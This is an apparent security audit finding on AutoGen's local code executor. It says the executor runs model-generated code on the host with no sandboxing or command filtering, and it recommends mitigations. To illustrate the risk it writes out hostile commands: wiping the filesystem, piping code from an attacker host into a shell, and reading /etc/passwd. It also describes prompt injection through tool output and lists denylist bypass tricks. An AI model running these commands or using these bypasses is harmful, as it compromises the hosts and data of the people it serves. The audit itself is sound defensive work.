python/packages/autogen-ext/src/autogen_ext/code_executors/local/__init__.py
The LocalCommandLineCodeExecutor runs model-generated code directly on the host, with no sandboxing. Its class documentation claims that sanitization occurs:
"Command line code is sanitized using regular expression match against a list of dangerous commands"
No such check was found in the implementation reviewed at the path above. The executor:
- Writes each code block to a temporary file
- Executes it via asyncio.create_subprocess_exec()
- Applies no filtering of dangerous shell commands
- Enforces no resource limits other than a wall-clock timeout
A malicious or compromised model, or a prompt injection carried in tool output or retrieved content, can make the executor run commands such as:
    rm -rf /                    # destroy the host filesystem
    curl attacker.com/x | sh    # fetch and execute attacker-controlled code
    cat /etc/passwd             # read any file the executor's user can read, then exfiltrate it
The generated code runs with the full privileges, network access and environment (including any API keys) of the process hosting the agent.
- Severity: CRITICAL
- Impact: complete compromise of the host running the agent
- Likelihood: HIGH (the local executor is the default choice in many use cases because it needs no additional setup)
Existing mitigations:
- The class documentation warns that the executor is "unsafe"
- The documentation recommends the Docker-based executor instead
- A wall-clock timeout (60 seconds by default) bounds how long a command runs, but not what it does
Recommendations:
- Implement the dangerous-command filtering the documentation describes (rm -rf, mkfs, etc.), and treat it strictly as defence in depth: a regex denylist over source text is trivially bypassed (split flags, shell variable expansion, base64 wrapping, a second interpreter such as python -c) and must not be presented as a sandbox
- Restrict filesystem access (chroot, seccomp)
- Block network access in the local executor (for example by running the child in an unshared network namespace)
- Make the Docker executor the default
- Add the ability to run generated code as a dedicated non-privileged user, with resource limits (CPU, memory, file size, process count) applied to the child process